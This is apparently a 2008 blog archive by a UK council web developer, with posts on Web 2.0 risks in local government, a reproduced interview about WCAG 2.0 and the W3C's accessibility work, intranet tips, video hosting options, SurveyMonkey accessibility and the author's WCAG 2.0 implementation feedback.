So what does this mean for the local gov web developer? The public sector is traditionally very slow at responding to trends and change, so many of us are currently in a situation where we're locked out of the playground whilst the rest of the world has fun playing this new game. Why? Because of risk.

The perils of public opinion

The risks to which I'm referring are fairly obvious. Post a Youtube video and you may get negative comments; set up a MySpace profile and you don't know who you'll be making friends with; start a blog and people might find out you don't have a clue what you're talking about (*cough*). In essence, Web 2.0 is about giving power to the people - the Information Superhighway is no longer a one-way street (actually, it hasn't been a one-way street for a long time, it's just that continuing developments are making it easier, quicker and cheaper than ever to get involved).

Is this something that local government has the confidence to open itself up to? More often than not, regrettably, no. Once something is out there, there's no bringing it back in. The lack of control is something that I've found to be a major sticking point. But the obvious rebuttal to this is that conversations are going on out there, whether we're involved or not. Surely it's far better to be playing the game badly than not playing at all?

Getting it wrong

Well, not always. There have been some good examples of why dipping your toes in the Web 2.0 waters can often lead to losing a pinkie. And although the biggest mistake would be to ignore Web 2.0 completely, there's plenty of reasons to pause for thought. Bad examples we've seen recently include Youtube videos withdrawn because of inappropriate messages (someone forgot to dis-allow commenting) and social networking accounts shut down through lack of interest (very embarrassing to learn you have no friends).

So how can we avoid the pitfalls? Stephen Dale, in his excellent article on Utilising Web 2.0 in local government, gives the following tips:

Simple guidelines for Web 2.0 deployment

  • Don't think about Web 2.0 or e-government as being just about technology. It is about saving time and making life easier and more efficient for citizens.
  • Make sure you are resourced to cope. No point setting up a blog that encourages comments if you can't respond to each comment.
  • Carefully plan your strategy if using blogs. If it's a council blog, make sure it's part of a wider communications strategy and not the domain of one or two keen individuals.
  • Consider the reputational risks of publishing un-moderated citizen comments in online forums or blogs. Don't assume comments represent universal opinion.
  • Identify the audience you are trying to reach and use the appropriate channel. Not everyone has an account on Facebook, Myspace or Bebo, and not everyone has broadband. Know who you are excluding and plan for this.
  • Ensure there is a staff policy for using social media sites during working hours.
  • Most Web 2.0 solutions are relatively cheap to deploy. If you are planning to spend more than £100k on an enterprise solution you're doing something wrong - or you have particularly complex requirements.
From Stephen Dale's Utilising Web 2.0 in local government
I'll post more thoughts after Friday's conference, but one thing is certain - it's going to be a long and winding road.

Wednesday 22 October 2008

WCAG 2.0 and WAI interview

There's an interesting article in the latest e-access bulletin, produced by Headstar. As they haven't yet updated their website with this bulletin, I've reproduced the article below. For more information about the bulletin see www.headstar.com/eab.

Global Standards Giant Gears Up For Battle
by Dan Jellinek.

With the long-awaited appearance of version 2 of the World Wide Web Consortium's Web Content Accessibility Guidelines (WCAG) now expected in December, the spotlight is set to fall once more on the workings of this key international standards body.

The consortium, known as W3C, was founded in 1994 by the inventor of the web Tim Berners-Lee, who remains its director. It functions as a developer and repository of key technical standards and protocols that are needed to be shared by technology companies and users to ensure that the web remains open and universal.

With a current membership of more than 400 organisations, from large multinational technology companies to universities and charities, W3C has three main global bases: the European Research Consortium for Informatics and Mathematics (ERCIM) at the Sophia Antipolis technology park in the South of France; Massachusetts Institute of Technology's Computer Science and Artificial Technology Laboratory; and Keio University in Japan.

The consortium has a core staff of around 70, with around 30 in Europe, 30 in the US and 10 Japan. But the actual headcount of those involved in its work is more than 500 if a tally is taken of everyone in the consortium's working groups, interest groups, and the wider community.

The WCAG work falls under the auspices of W3C's Web Accessibility Initiative (WAI), a programme that cuts across all the consortium's other areas. In a UK visit last month, two WAI staff Shadi Abou-Zahra and Andrew Arch met E-Access Bulletin in London to explain their work programme.

"WAI is one of the consortium's main work areas, and cuts across all the W3C's global locations," said Abou-Zahra. "One of our tasks is to cross-check all W3C's work such as that on [the web's core protocol] HTML to check it supports accessibility, because if standards like HTML don't support accessibility, you won't have accessible websites.

"This is really one of the most important pieces of work we are doing, though it is the least visible to the outside world. What's most well- known about WAI's work is its development of three guidelines - WCAG, ATAG (Authoring Tool Accessibility Guidelines) and UAAG (User Agent Accessibility Guidelines).

Authoring tools guidelines relate to content management systems, and are aimed at ensuring these systems need to create accessible content, while user agents are tools like browsers and media players, Abou- Zahra says.

"Other areas of our work include education and outreach, which is really important, because most people who make inaccessible websites are often unaware of the issues for people with disabilities."

One major new piece of work undertaken by WAI is the EC-funded WAI-AGE Project ( http://www.w3.org/WAI/WAI-AGE/ ), a look at the implications of an ageing population for web access, given the older people are more likely to have disabilities and may also be less familiar with new technologies.

"Demographics worldwide are dramatically changing at the moment,"
says Andrew Arch, who works with Abou-Zahra on WAI-AGE. "The proportions of older to younger people are changing as well as the numbers. We're living longer, and we haven't got the support behind us.

"Lots of things have got to change in governments and organisations - with an ageing workforce, you have to keep learning to stay accessible."

The WAI-AGE project is partly aimed at finding out whether there are any significant new pieces of work needed to ensure web accessibility for an older population, Arch says.

"We've looked at what research and user observation has gone on over the decade. There is a pretty big overlap between older people and others with disabilities - sight starts to decline, motor dexterity - and individually these overlap. But with older people there is often a lack of recognition that there is a disability there. For example some people might just say they can't remember so well, rather than that they have a cognitive impairment. Or people won't see failing eye-sight as a disability, it's just 'part of growing old'. But they are disabilities, and often multiple disabilities."

Having gained a grasp of current research the project returned to guidelines such as WCAG 2.0 to see if any changes might be needed.
"A large proportion of the needs of older people are met by the new guidelines, but other things might need to feed into the guidance we will issue on implementing the guidelines, for example guidance on how people prepare content for older people.," said Arch.

"Many older people have not grown up with computers, and may not realise their capabilities, for example that you can magnify text in your browser."

However as well as helping to address the problems of ageing it is also important to challenge myths and assumptions about older people such as none of them have any interest or expertise in using computers, says Abou-Zahra. "Social networking is an important part of ageing, for example. And making social networking sites more accessible for older users benefits everybody."

This argument is a development of the age-old mantra from the accessibility sector that people with disabilities want to use the web in the same way as everybody else - "it is a human right recognised by the UN," says Abou-Zahra. But he recognizes that businesses in particular will also be interested in the additional business benefits, especially in the current financial climate.

"With commercial organisations the return on investment is often an important argument. Well, a few years ago, companies might have said 'how many older people are online?' but with demographics changing they know the answer. And with the current surge in mobile phone use there is another incentive, since accessible sites work better on mobile phones."

Other financial factors include helping to hold onto employees as their average age rises through making internal web systems more accessible, though more work is needed on in all these areas, he says.
"We know there are not enough numbers attached to these business cases, and we hope for more soon. There is a business case document for accessibility on the WAI website, and we are updating it to reflect new developments."

For many, however, the key accessibility event of the year - assuming it does scrape into 2008 - will be the release of WCAG 2.0.

The WCAG working group held a face-to-face meeting in Boston at the beginning of October to examine the results of trial implementation of the draft guidelines on real websites, and now expects to finalise WCAG 2.0 as a fully-fledged W3C recommendation by December or at the latest by early next year, Abou-Zahra says.

The first version of the WCAG guidelines now dates back around a decade, and though it has proved a vital tool for raising awareness of accessibility issues it has long been seen as over-technical and complex and unclear in many situations.

Version 2.0 is set to address many of these problems by moving away from rigid technical 'checkpoints' to more flexible 'success criteria.'

Another change of style will be a greater separation between the core guidelines and references to specific technologies such as Javascript or browser types, Abou-Zahra says.

"The work needs to be coupled to technologies, but how do we do that in such a way as to not make it outdated the moment it is released?
This is the complex issue," he says.

"WCAG 1.0 was too technology-specific. Back then HTML was more dominant, and there was less use of multimedia, but today we have a flurry of technologies such as Ajax, so the first lesson we learned is don't write for a specific technology. Also, in the days of WCAG 1.0 we had to exclude Javascript because it was not sufficiently standardised and assistive technology could not handle it consistently, but now that has largely changed so you need to include it, to look at how any technology should be accessible. The requirements - such as tagging images with text - needs to apply to any technology you are using.

"So WCAG is more decoupled - but having said that, no matter how much you decouple it from specific technologies, there still need to be points of contact with real technologies, places where the tyre hits the road. It is an issue the group is looking to resolve by updating implementation guidance."

Another ongoing problem with the WAI web content guidelines is that they do not fully address the needs of people with cognitive disabilities, admits Abou-Zahra, though he says this is a challenging longer term issue that the organisation is working to resolve alongside the wider access community.

"We know it does not fully meet the needs of people with cognitive disabilities such as some forms of learning disabilities, we admit this up-front," he says. "It is a longer term project, maybe one for WCAG 3.0. I feel this is an issue that the accessibility community as a whole needs to address, more research is needed."

Beyond the publication of WCAG 2.0, W3C and WAI will continue to prioritise accessibility across all its areas of work, he says. "WAI's work is often reduced to WCAG in the public eye, but it is a whole lot more than content, it is about making the web accessible in its broadest sense."

UK accessibility survey

A UK taskforce of charities and associations has launched a survey to find out about ICT Accessibility awareness and practices.

The initial aim is to produce an ICT Accessibility Business Case with case studies and implementation plan, followed by other potential tools and information, to help companies plan and incorporate ICT accessibility. The business case is expected to be published in March 2009.

The survey is open until 1st November, and participants can opt in to receive the survey results and final business case once published. No previous knowledge of accessibility is required.

Find the survey at http://cs.createsurvey.com/c/45/45/survey/507-Z0TuTA.html

The taskforce is made up of the following organisations:
  • AbilityNet
  • British Computer Society (BCS)
  • City University
  • Employer's Forum on Disability (EFD)
  • Intellect UK - Representing the UK Technology Industry
  • Leonard Cheshire Disability
  • Radar - The Disability Network
  • Society of Information Technology Management (SOCITM)
  • Worshipful Company of Information Technologists (WCIT)

Tuesday 21 October 2008

Downloads - a helping hand

Never over-estimate your users' abilities...

Through user feedback on our Intranet we've picked up that not all of our staff are computer-literate enough to know how to properly handle document downloads. It appears many are opening forms online, filling them in within the browser, and then trying to save or e-mail - a technique which doesn't always work.

We've also got the added issue that our current Intranet is based on frames (tut tut) and unless you specify a target for document links, they will open within the frameset, compounding people's confusion.

The only solution to this is to try to educate our users, and to this end I've come up with the following short but succinct tip:

Opening, saving and printing documents

To open, save or print documents, such as Word or PDF files, right-click on the document link (or Ctrl + click on a Mac) and then choose:
  • 'Open in new window' (to view online)
  • 'Save Link As...', 'Save Target As...' or equivalent (to save the document to your computer), or
  • 'Print target' (to print the document)

This tip can be replicated on all pages where there are downloads available, and is hopefully simple enough for all users to grasp. It takes account of the fact that we have multiple browsers within the organisation, but combines the instructions for brevity.

Trying to educate users of a public site is like pushing peas up a hill with a rake, but there's a much stronger return for doing it with an internal audience. Every member of staff you educate, in a way that saves them time, improves your organisation's efficiency and provides a real cost benefit. This is also why Help sections, FAQs and basic guidelines can be a great idea.

Info for non-mouse users

As a brief aside - the instructions above are only for mouse-users. This excludes people with various disabilities, such as those with limited or no use of their arms, or blind users using screen reader software. It was decided to omit keyboard-specific instructions for three reasons; firstly because including these details would have reduced the concise nature of the instructions; secondly because we can assume that such users will have a high level of support already available to them within the organisation; and thirdly because they will most likely already have the knowledge of how to open links and documents correctly with their preferred software or method of browsing.

Such assumptions can not be made for a public audience, and we would expect to offer guidance, perhaps as part of a Help section or via the Accessibility link prominent on every page.

Monday 20 October 2008

Maximising Intranet usage

Keep them coming...
We launched our new intranet four months ago, and we're already seeing interest start to dip, with people going back to old habits. Used properly, the Intranet has the potential to be the most important channel of communication in the organisation - allowing key messages to reach staff instantly; providing a means of collaboration; and banishing the mental and physical barriers that serve to create silos across the departments.

There is of course a balance to be struck in any efforts to increase usage of a corporate intranet. Whilst you want people to use it, it must also serve the business needs of the organisation. So whilst there's room for the odd timewaster, this must be carefully balanced so as not to detract from the real purpose of the site.

Here are some things I'm already offering on the department's homepage:

Latest news

An obvious one really - pulling in press releases from the public-facing site, along with links to newsletters. This means the page will usually have something fresh to offer, and gives the user a feeling of being connected to the 'wider picture'.

Recent additions

A great way to promote new content.

Popular downloads

Again, a great way to highlight new files, but also to give people a shortcut to commonly accessed documents such as HR forms. The web stats for the site lends a hand here, highlighting the most popular files.

Dates and events

A really popular feature, and another one that gives the page a feeling of being linked to the wider world. Here we link to local events; such as festivals, lectures or exhibitions; as well as national and international campaigns (which for October includes Black History Month, International Walk to School Month and School Libraries Month).

So what next? We're somewhat limited by technology, but here are a few possibilities:

RSS feeds

It would be great to provide some external content - national news, weather, local events for example. Many sites offering this sort of information also offer RSS Feeds which we could quite easily pull into our pages. To this end I've created a test page with feeds from BBC news, Yahoo weather and a local events site. I'll be opening this up for consultation shortly, and hope the response will be a positive one. I'll also be encouraging suggestions for other feeds.

The feeds are pulled in using a nice Javascript generator available at itde.vccs.edu/rss2js.

Cartoon strips

Daily cartoon strips such as Garfield and Dilbert are very popular, but there is a syndication cost attached to using them, making it an unlikely option. Even so, for those with a budget they can offer a really strong daily pull factor.

Friday 17 October 2008

public.tv vs youtube

I've been looking into the possibility of getting some of our Council's videos online, following a number of requests. Possible examples include footage of awards ceremonies , interviews with service providers, and content presented in British Sign Language as an alternative to text.

Part of the business case that I'm writing involves appraising the options for hosting such videos. Option 1, in-house hosting, seem an unlikely choice due to recent performance issues and the potential demands such content could place on our servers. Options 2 and 3 are outlined below:

Option 2 - Youtube

Summary

Youtube is an internationally recognised brand, now owned by Google. Nottinghamshire County Council posted a number of videos onto Youtube in January 2008, featuring the CEO discussing staff restructuring.

Costs and issues

Currently there is no charge for posting content to Youtube. A potential risk is that Google have announced that they intend to introduce advertising to Youtube videos in 2008 , and the nature and suitability of these adverts can not yet be ascertained. There are also no guarantees over the permanence or quality of service provided.

Restricted access

A problem also exists in that Youtube is currently blocked by the Council’s web filters. A change in policy would be required to allow access either for selected staff only or on a Council-wide level.

Option 3 - public.tv

Summary

Many local organisations and government bodies have posted content to public.tv – a site owned by media company Ten Alps. This includes the Scottish Government, Scottish Parliament and the University of Edinburgh.

Costs and issues

There is no charge to post videos to public.tv. As with Youtube, there are no guarantees over the permanence or quality of service provided. The public.tv is not blocked by the Council filters. Advertising is present on the public.tv website, but does not appear within the video presentation itself.

Based on these findings my colleagues are now looking more closely at Public.tv to see what it can offer us. I'm excited by the possibilities that this sort of feature could present to us, and will post details of any progress here in due course.

Update 31st Dec 2008 - I've just noticed that the Public.tv site seems to be down, displaying only a 'coming soon' message. Not sure what's going on there...

Thursday 16 October 2008

Survey Monkey accessibility

I've been approached to take on some responsibilities for my organisation's Survey Monkey account. Survey Monkey claims that it has a single purpose: "to enable anyone to create professional online surveys quickly and easily". We use it for internal and external consultations, as a 3rd party alternative to the clunky CMS which is currently running our corporate sites.

The first thing I was keen to establish was whether Survey Monkey was accessible. If we're using it for important Council consultations and some of our users face barriers in completing the survey then we, quite rightly, risk claims of discrimination. Moreover, if the surveys are poor in terms of usability, the response rate is likely to suffer.

My first port of call was Survey Monkey itself, which had the following to say:

Your SurveyMonkey survey designs are now Section 508 compliant and accessible!

SurveyMonkey is now the only online survey application whose surveys are Section 508 Certified. We ensure that by using our standard survey designs, your survey will meet all current US Federal Section 508 certification guidelines. Our developers have updated our SurveyMonkey survey design system across the board in all accounts. All standard survey designs are accessible and 508 certified and compliant for respondents with disabilities. This has all been accomplished without changing the appealing look or function of your survey.


  • You do not need to add any special settings or change anything within your survey design.
  • If you are using a standard survey theme in your survey design, it is automatically 508 compliant.
This seems quite encouraging. However, compliance to Section 508 does not inherently mean complete accessibility, and is also not a legal benchmark here in the UK.

I next came across a Survey of Survey Tools done by the Web Accessibility Centre at the Ohio State University, looking at the accessibility of six of the top survey tools. This identifies a few issues which it suggests have not been solved by the recent efforts to comply with Section 508.

The overall grade given to Survey Monkey in this survey was B, meaning the majority of it was accessible. Problem areas included accessibility for sighted keyboard users, especially when in Windows' High-Contrast mode. It was also found that a keyboard user would not be able to navigate as an administrator. This means we could risk discriminating against our own staff as well as the end user.

I now intend to carry out some direct testing, and will publish the results here when that is complete.

Tuesday 14 October 2008

WCAG 2.0 and I

The Web Content Accessibility Guidelines (WCAG) are a collection of guidelines intended to make web content accessible to all users (regardless of technology, disability etc). They were first published by the World Wide Web Consortium (W3C) in 1999. Over the past few years there has been an effort to update these guidelines with a second version - WCAG 2.0.

WCAG 2.0 Candidate Recommendation

Earlier this year I was involved in the Candidate Recommendation stage of WCAG 2.0. This was essentially a chance for web developers and designers to 'test-drive' the guidelines to ensure they are usable in real-life scenarios. With a number of the guidelines up for review as potentially unworkable, this stage of the process was vital.

I submitted a proposal to re-design www.prettysimple.co.uk and this was chosen as one of the implementation sites in June 2008.

Implementation experience

On submitting my site re-design for the WCAG 2.0 Candidate Recommendation, I was asked to provide feedback on all relevant areas of comformance - detailing how I met each guideline. My feedback was as follows:

1.1.1: Non-text Content (A)

Alt descriptions for images with relevant content. Null alt attributes for decorative images.

1.3.1: Info and Relationships (A)

Semantic elements used to structure page and convey information. Includes using navigation lists and page headings, and using CSS for layout and formatting.

1.4.1: Use of Color (A)

Colours not used to convey meaning.

1.4.3: Contrast (Minimum) (AA)

High contrast for test achieved using a span background colour.

1.4.4: Resize text (AA)

All text can be resized by user agents, by at least 200%.

1.4.5: Images of Text (AA)

Non essential text appearing as images given very large font size and alternative attributes.

2.1.1: Keyboard (A)

All aspects of the site can be navigated and accessed by keyboard. Use of skip links.

2.1.2: No Keyboard Trap (A)

No keyboard traps present.

2.4.1: Bypass Blocks (A)

No keyboard traps present.

2.4.2: Page Titled (A)

Appropriate titles given to all pages.

2.4.3: Focus Order (A)

All elements appear in the correct order in the source code.

2.4.4: Link Purpose (In Context) (A)

Link text sufficiently descriptive to be obvious when read alone.

2.4.5: Multiple Ways (AA)

Main navigation links are supplemented by relevant contextual links within main content.

2.4.6: Headings and Labels (AA)

Heading used to highlight subsections of each page, where appropriate.

2.4.7: Focus Visible (AA)

All links have a highly visible link, visited, focus, hover and active state.

3.1.1: Language of Page (A)

Default language defined on every page.

3.2.1: On Focus (A)

Links do not open in new window.

3.2.2: On Input (A)

Links do not open in new window.

3.2.3: Consistent Navigation (AA)

Navigation is consistent on every page.

3.2.4: Consistent Identification (AA)

All functionality is consistent across every page.

4.1.1: Parsing (A)

All XHTML and CSS validated accordingly to formal grammars.

Acceptance e-mail and amendments

On Wednesday September 24th I received an e-mail from Loretta Guarino Reid, co-chair of the WCAG Working Group, telling me that my site had been evaluated and found to conform to level AA of WCAG 2.0, with just a couple of exceptions. These were:

Insufficient contrast for the main menu

This came about from a change in the rules for colour contrasts. I had used algorithms relevant to WCAG 1.0, due to a lack of many good tools for testing against WCAG 2.0. However, after a bit of searching I found the WAT-C Luminosity Contrast Ratio Analyser 1.1 and used this to bring the colours into conformity.

Use of color

It was noticed that some links could only be identified as such by their colour. By making all links Bold as well, this was resolved. This was in line with the advice given as part of the notes accompanying F73: Failure of Success Criterion 1.4.1.

Implementation report

I'm now hoping that my site will be included in the final report, which the working group hopes to publish by Christmas 2008.

PS: For an excellent account of implementing WCAG 2.0, from a fellow implementor, see Mike Cherim's article My WCAG 2.0 AAA Implementation.

Wednesday 1 October 2008

Aberdeenshire Council blog

In September 2008 Aberdeenshire Council's web team set up a blog in order to communicate with the public and their own staff during the redesign of their corporate website. They asked for comments on the Public Sector Forum and I gave the following feedback:

This is a very interesting approach to gathering user feedback, and also interesting that you have used just one platform for both staff and the general public. It would be interesting to know how you are promoting the blog to the two groups, and whether your rules for comment moderation reflect those potentially disparate audiences.

The most attractive thing for me is that the blog has a very clearly defined raison d’etre. The fact that it will have a finite lifespan (i.e. until the delivery of the new site) means that you’ve set a realistic premise – most open-ended blogs die a death sooner or later which can look very bad for an organisation.

I do wonder whether it might be wise to offer more traditional ways for users to provide feedback as well, though. The blog itself offers no other method of contact - was it a conscious decision not to encourage that? Many users may not have the confidence to submit a comment, to be read and scrutinized by the public at large, and past studies have suggested that about 95% of blog users are ‘lurkers’, never contributing to discussions. There is also a risk that only the more technically-proficient will find and engage with the blog, excluding many of the users for whom your website improvements could most benefit. Perhaps you are planning other forms of outreach to counter these issues?

All in all, though, this looks like a great effort to involve your users from a very early stage of development, when significant change can still be effected without significant cost.

The response to my feedback was positive and very pro-active, with a Contact Us section appearing the next day. I look forward to seeing how this blog develops over the coming months.